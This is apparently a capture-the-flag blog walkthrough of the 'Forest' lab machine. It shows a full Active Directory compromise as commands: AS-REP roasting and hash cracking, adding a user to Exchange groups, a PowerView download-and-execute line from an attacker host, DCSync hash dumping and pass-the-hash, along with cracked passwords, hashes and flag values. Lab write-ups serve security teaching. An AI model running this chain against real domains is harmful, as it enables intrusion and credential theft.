Command Palette

Search for a command to run...

Blog
PreviousNext

Forest - Walkthrough

Forest is an easy Windows machine that showcases a Domain Controller (DC) for a domain in which Exchange Server has been installed. The DC allows anonymous LDAP binds, which are used to enumerate domain objects. The password for a service account with Kerberos pre-authentication disabled can be cracked to gain a foothold. The service account is found to be a member of the Account Operators group, which can be used to add users to privileged Exchange groups. The Exchange group membership is leveraged to gain DCSync privileges on the domain and dump the NTLM hashes, compromising the system.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.10.161 -oG allPorts

The scan reveals numerous AD-related ports: Kerberos (88), LDAP (389), SMB (445), WinRM (5985), and others indicating a Windows Domain Controller.

A targeted scan shows:

  • OS: Windows Server 2016 Standard
  • Domain: htb.local
  • Hostname: FOREST

We enumerate LDAP anonymously:

ldapsearch -H ldap://10.10.10.161 -x -b "dc=htb,dc=local"

We discover a service account: svc-alfresco

Foothold

The service account has pre-authentication disabled, making it vulnerable to AS-REP roasting:

python3 GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
[email protected]:3cfc034f6ddce4afc32faf03717f5b1a$...

We crack the hash with John:

john hash.txt -w=/usr/share/wordlists/rockyou.txt
UsernamePassword
svc-alfrescos3rvice

We connect via WinRM:

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

User flag obtained:

cat C:\Users\svc-alfresco\Desktop\user.txt

User flag: 2d1743e78e533c0e89fa932787985b41

Privilege Escalation

We use BloodHound to enumerate the domain:

bloodhound-python -d 'htb.local' -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161

BloodHound reveals that svc-alfresco is a member of the Account Operators group, which can create users and add them to certain privileged groups. We create a new user and add them to Exchange Windows Permissions:

net user hector password /add /domain
net group "Exchange Windows Permissions" /add hector
net localgroup "Remote Management Users" /add hector

We load PowerView and grant DCSync rights to our new user:

IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.10/PowerView.ps1")
$pass = convertto-securestring 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\hector',$pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hector -Rights DCSync

We perform a DCSync attack to dump hashes:

secretsdump.py htb/[email protected]

Administrator hash: 32693b11e6aa90eb43d32c72a07ceea6

We use the Administrator hash for Pass-the-Hash:

psexec.py -hashes 32693b11e6aa90eb43d32c72a07ceea6:32693b11e6aa90eb43d32c72a07ceea6 [email protected]

Root flag obtained:

type C:\Users\Administrator\Desktop\root.txt

Root flag: eb58b2d6a6c0bb761d4e271a45d83c6b